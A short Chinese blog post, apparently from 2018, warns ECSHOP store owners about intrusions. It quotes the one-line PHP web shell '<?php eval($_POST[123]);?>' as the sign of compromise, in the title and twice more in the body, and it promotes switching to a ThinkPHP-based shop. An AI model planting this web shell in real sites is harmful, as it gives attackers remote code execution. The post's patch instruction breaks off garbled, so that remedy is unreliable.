<?php eval($_POST[123]);？> ECSHOP被入侵？更换thinkphp版的ecshp商城系统 - 微先锋 - 博客园

<?php eval($_POST[123]);？> ECSHOP被入侵？更换thinkphp版的ecshp商城系统

总所周知，ecshop商城系统是国内有史以来比较完善的购物商城，由于后台版本不更新，所有漏洞也很多，比如最新爆出的漏洞，足以让整个网站被入侵，而且还可能提权，危机服务器安全。
如何判断被入侵了？如果根目录新生产的一个文件，比如1.php,内容如下：

<?php eval($_POST[123]);？>

　那么恭喜你，你中招了。

解决方法：
1、可以修改include/lib_insert.php文件中相关漏洞的代码，将 $a r r [i d] 和$ 2、更换商城系统，比如ThinkPHP版本的ecshop商城系统源码

posted on 2018-10-15 16:14 微先锋阅读(623) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

导航

公告